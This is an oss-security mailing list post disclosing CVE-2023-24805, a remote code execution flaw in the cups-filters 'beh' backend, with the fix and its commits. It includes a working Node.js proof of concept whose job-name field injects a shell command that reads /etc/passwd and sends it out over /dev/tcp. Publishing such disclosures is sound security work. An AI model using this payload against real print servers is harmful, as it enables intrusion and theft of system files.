[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CVE-2023-24805: RCE in cups-filters, beh CUPS backend
From: Till Kamppeter <till.kamppeter () gmail ! com>
Date: 2023-05-17 9:30:11
Message-ID: d20c573e-81ca-800d-5bf8-c2f96b31ea82 () gmail ! com
[Download RAW message or body]
Following bug got reported to OpenPrinting's GitHub, repo cups-filters,
as a private (security) issue report:
https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-gpxc-v2m8-fr3x
Summary
If you use "beh" to create an accessible network printer, this security
vulnerability can cause remote code execution.
Details
cups-filters/backend/beh.c
Line 288 in 5c9498a
retval = system(cmdline) >> 8;
// (context: argv = beh <job-id> <user> <title> <copies> <options>
[file])
snprintf(cmdline, sizeof(cmdline),
"%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
cups_serverbin, scheme, argv[1], argv[2], argv[3],
...
(argc == 6 ? "1" : argv[4]),
argv[5], filename);
...
retval = system(cmdline) >> 8;
The system function will be called here to execute the command, and the
user and title parameters are user-controlled and unsanitized .
PoC
start a beh service lpadmin -p myprinter -E -v
beh:/1/3/5/socket://printer:9100
exploit: // https://github.com/williamkapke/ipp
var ipp = require('ipp');
var PDFDocument = require('pdfkit');
var concat = require("concat-stream");
var doc = new PDFDocument({margin:0});
doc.text("1.pdf", 0, 0);
doc.pipe(concat(function (data) {
var printer = ipp.Printer("http://127.0.0.1:6310/printers/myprinter");
var msg = {
"operation-attributes-tag": {
"requesting-user-name": "Bumblebee",
"job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd >
${PWD}dev${PWD}tcp${PWD}127.0.0.1${PWD}1337\";'' #.pdf",
"document-format": "application/pdf"
},
"job-attributes-tag":{
"media-col": {
"media-source": "tray-2"
}
}
, data: data
};
printer.execute("Print-Job", msg, function(err, res){
console.log(err);
console.log(res);
});
}));
doc.end();
The report got assigned CVE-2023-24805
A fix is to use execv() instead of system() and was proposed as a pull
request attached to the bug report.
https://github.com/OpenPrinting/cups-filters-ghsa-gpxc-v2m8-fr3x/pull/1
The pull request is merged now into
https://github.com/OpenPrinting/cups-filters (branch "master")
as commit
https://github.com/OpenPrinting/cups-filters/commit/8f274035756
and the fix is also ported to the "1.x" branch of cups-filters, as commit
https://github.com/OpenPrinting/cups-filters/commit/93e60d3df35
The fix will also be included in the upcoming releases, 2.0.0 and 1.28.18.
Till
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic